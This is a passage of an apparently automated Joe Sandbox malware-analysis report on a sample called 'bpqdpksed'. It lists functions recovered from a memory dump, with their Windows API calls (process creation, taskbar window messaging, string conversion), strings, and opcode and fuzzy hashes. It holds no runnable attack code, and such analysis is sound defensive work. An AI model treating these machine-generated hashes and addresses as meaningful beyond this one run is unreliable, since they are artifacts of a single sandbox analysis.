                                                                                                • Part of subcall function 00DC4536: GetClassNameW.USER32(?,?,000000FF), ref: 00DC4559
                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00DC2558
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 624084870-1403004172
                                                                                              • Opcode ID: bdc14c7d7956de6697325e683b5960d26d87fed38da1530bec45f11b3abadfa9
                                                                                              • Instruction ID: 7bc305299323563f9dcbd0e04e34eded8180eca14596aac8f20a2d379813af81
                                                                                              • Opcode Fuzzy Hash: bdc14c7d7956de6697325e683b5960d26d87fed38da1530bec45f11b3abadfa9
                                                                                              • Instruction Fuzzy Hash: AC01A27165010AA7CB15EBA4C922FFF77A8DB15750F18001A7942B72C2EA60DF088671
                                                                                              Function 00DC25F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                                • Part of subcall function 00DC4536: GetClassNameW.USER32(?,?,000000FF), ref: 00DC4559
                                                                                              • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00DC2663
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 624084870-1403004172
                                                                                              • Opcode ID: 1111303e7c65e7f4cc7288aac0ff1d71dbdacf77bb67e376d8b68018ae114ffd
                                                                                              • Instruction ID: 21c73b6ff8b63025437f1cf455926b93943b3bf085da3af64e8b8c02957fd15d
                                                                                              • Opcode Fuzzy Hash: 1111303e7c65e7f4cc7288aac0ff1d71dbdacf77bb67e376d8b68018ae114ffd
                                                                                              • Instruction Fuzzy Hash: 5CF0A471A8021AA7CB14F7A49C62FFF7778EF15720F040A1AB562A72C2DB7099088674
                                                                                              Function 00DF8AD1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E34018,00E3405C), ref: 00DF8B1E
                                                                                              • CloseHandle.KERNEL32 ref: 00DF8B30
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID: \@
                                                                                              • API String ID: 3712363035-3571869489
                                                                                              • Opcode ID: 6d26fd6a90318d0eef2a6caa96326962ce28dfece37da4f97eb00906db61a0c5
                                                                                              • Instruction ID: 38e48a24106975bb2fa5f30573e15f6837e084a679b4d4f7c58940d778d4fb10
                                                                                              • Opcode Fuzzy Hash: 6d26fd6a90318d0eef2a6caa96326962ce28dfece37da4f97eb00906db61a0c5
                                                                                              • Instruction Fuzzy Hash: 1BF054F2640308BFF2202B616C4AF773E9DDB05750F014020BB08E61D1D6755C449BBA
                                                                                              Function 00DF2C81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DF2C8B
                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00DF2C9E
                                                                                                • Part of subcall function 00DCF1A7: Sleep.KERNEL32 ref: 00DCF21F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 529655941-2988720461
                                                                                              • Opcode ID: d89f91c1187bca4930dd1f556ca1c1fbac8455f2174313f71d5e47d24a518db0
                                                                                              • Instruction ID: 363219ceb7368dd8a8b762ef0099e18ae23154d43e4ecac68a0cdeb2f9590fe9
                                                                                              • Opcode Fuzzy Hash: d89f91c1187bca4930dd1f556ca1c1fbac8455f2174313f71d5e47d24a518db0
                                                                                              • Instruction Fuzzy Hash: 4BD012363C4350BBF668B770EC0FFE67A57AB50B15F1048267749EA2D0C9E06800C674
                                                                                              Function 00DF2CB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DF2CCB
                                                                                              • PostMessageW.USER32(00000000), ref: 00DF2CD2
                                                                                                • Part of subcall function 00DCF1A7: Sleep.KERNEL32 ref: 00DCF21F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 529655941-2988720461
                                                                                              • Opcode ID: 279d14c9ea1b3cba623c765b9f2e14e03010cfd24a906cdce8b7fe148fe19283
                                                                                              • Instruction ID: e6527456674ec0ef6a9504999a4c6c0d57a1fb8deb795ae78c8e4123e601e523
                                                                                              • Opcode Fuzzy Hash: 279d14c9ea1b3cba623c765b9f2e14e03010cfd24a906cdce8b7fe148fe19283
                                                                                              • Instruction Fuzzy Hash: E4D012363C53507BF668B770EC0FFD67A57AB55B15F5048267745EA2D0C9E06800C678
                                                                                              Function 00D9C19D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00D9C233
                                                                                              • GetLastError.KERNEL32 ref: 00D9C241
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D9C29C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1717984340-0
                                                                                              • Opcode ID: 464307ece72279614912157eef11d20fa70a06da0f616bca51f116d4f1af2727
                                                                                              • Instruction ID: f59186347e49c89a0088ace84f74b2859080025a2fb1e1ca5e8b54d76553c5c6
                                                                                              • Opcode Fuzzy Hash: 464307ece72279614912157eef11d20fa70a06da0f616bca51f116d4f1af2727
                                                                                              • Instruction Fuzzy Hash: E941E731610306EFDF219FE4C844BBA7BA5EF45720F289169F859AB1A1EB308D01C774